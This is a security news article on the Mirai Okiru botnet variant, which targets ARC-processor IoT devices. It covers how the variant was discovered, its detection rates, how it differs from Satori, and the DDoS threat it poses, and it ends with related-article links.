Meet Mirai Okiru and brace for the DDoS botnet targeting 'billions' of ARC-based IoT devices. Credit: Thinkstock Well, this is bad…very bad. Mirai malware and its many variants which have targeted CPU architectures in the past, is now targeting the second most popular type of CPU core – ARC processors.Meet Mirai Okiru, the Mirai variant targeting ARC processors, which are embedded processors used in IoT, auto, mobile, TVs, cameras and a nearly endless list of products – CPUs reportedly shipped in over a billion products per year. Brace yourself for the botnet targeting ARC-based IoT devices.According to security researcher Odisseus:From this day, the landscape of #Linux #IoT infection will change. #ARC cpu has produced #IoT dervices more than 1 billion per year. So these devices are what the hackers want to aim to infect #ELF #malware with their #DDoS cannons. It’s a serious threat will be.#MalwareMustDie!— Odisseus (@_odisseus) January 14, 2018Odisseus noted that @unixfreaxjp, from the Malware Must Die team, first spotted the Okiru sample. At the time of writing, the detection rate was 13 of 58 on Virus Total; it was only 5 of 60 when Odisseus tweeted: This is the FIRST TIME ever in the history of computer engineering that there is a malware for ARC CPU, & it is #MIRAI OKIRU!! Pls be noted of this fact, & be ready for the bigger impact on infection Mirai (specially #Okiru) to devices hasn’t been infected yet.#MalwareMustDie pic.twitter.com/y8CRwwkenA— Odisseus (@_odisseus) January 14, 2018The detection rate for the Okiru downloader was only 1 of 59; it is a mere 4 of 59 at the time of writing.The news was picked up by Pierluigi Paganini on Security Affairs; Italy’s CERT (Computer Emergency Response Team) noted that 20 minutes after Security Affairs published a piece about Mirai Okiru, the “domain was subject to a massive DDoS attack that inhibited access for about an hour.” You may remember hearing about the Mirai malware variant Satori (pdf) back in December; it was sometimes also called Okiru. Satori was used to attack “hundreds of thousands” of Huawei routers. The exploit was released for “free” on Christmas by what NewSky Security dubbed a blackhat Santa.Despite the similarities of the two type of Linux IoT DDoS malware, Mirai Okiru is “very different” from the Mirai Satori variant. The differences were pointed out on the subreddit LinuxMalware.According to the translated version of CERT-PA’s post:The MMD researchers who have already proceeded to release the Yara rules to identify this new variant of Mirai, have compared Okiru with the previous Mirai botnet called Satori. According to the observations of the researchers, the Okiru configuration is encrypted in two parts and the attack via Telnet is much more incisive as it uses a list of over 100 credentials (114 are the credentials counted by MMD).Odisseus noted that it is important to understand the differences and have different signatures to detect both.Very important to understand how #Mirai #Satori variant is DIFFERENT from #Okiru: quick notes with screenshots by @malwaremustdie. And why it is needed different sigs to DETECT BOTH and how each has different effects in #IoT infection.https://t.co/Wdh52u1wBL#MalwareMustDie pic.twitter.com/AEtxqmsqiF— Odisseus (@_odisseus) January 14, 2018We all know that the majority of IoT devices have super sucky security – if there was security even bolted on at all. None of us will forget what 100,000 Mirai-infected devices were capable of doing, of taking down the DynDNS service. A piece written in 2014 claimed, “Synopsys’ ARC processor IP cores have been licensed by more than 190 companies and are used in more than 1.5 billion products a year.” Since that post is four years old, how many more products now have ARC cores? How many of those are “secure?”If you think back on the havoc wreaked by 100,000 devices taken over by the Mirai botnet in 2016, what hell can be unleashed in 2018 if attackers gain control of millions of ARC-based IoT devices for the Mirai Okiru DDoS botnet? More on DDoS attacks:DDoS explained: How distributed denial of service attacks are evolvingDDoS protection, mitigation and defense: 7 essential tipsSecurity firms team up to neutralize WireX botnet after multiple DDoS attacksHire a DDoS service to take down your enemies DDoS attack on BBC may have been biggest in historyApplication layer DDoS attacks risingSkilled bad actors use new pulse wave DDoS attacks to hit multiple targets Related content news Dow Jones watchlist of high-risk businesses, people found on unsecured database A Dow Jones watchlist of 2.4 million at-risk businesses, politicians, and individuals was left unprotected on public cloud server. By Ms. Smith Feb 28, 2019 4 mins Data Breach Hacking Security news Ransomware attacks hit Florida ISP, Australian cardiology group Ransomware attacks might be on the decline, but that doesn't mean we don't have new victims. A Florida ISP and an Australian cardiology group were hit recently. By Ms. Smith Feb 27, 2019 4 mins Ransomware Security news Bare-metal cloud servers vulnerable to Cloudborne flaw Researchers warn that firmware backdoors planted on bare-metal cloud servers could later be exploited to brick a different customer’s server, to steal their data, or for ransomware attacks. By Ms. Smith Feb 26, 2019 3 mins Cloud Computing Security news Meet the man-in-the-room attack: Hackers can invisibly eavesdrop on Bigscreen VR users Flaws in Bigscreen could allow 'invisible Peeping Tom' hackers to eavesdrop on Bigscreen VR users, to discreetly deliver malware payloads, to completely control victims' computers and even to start a worm infection spreading through VR By Ms. Smith Feb 21, 2019 4 mins Hacking Vulnerabilities Security Podcasts Videos Resources Events SUBSCRIBE TO OUR NEWSLETTER From our editors straight to your inbox Get started by entering your email address below. Please enter a valid email address Subscribe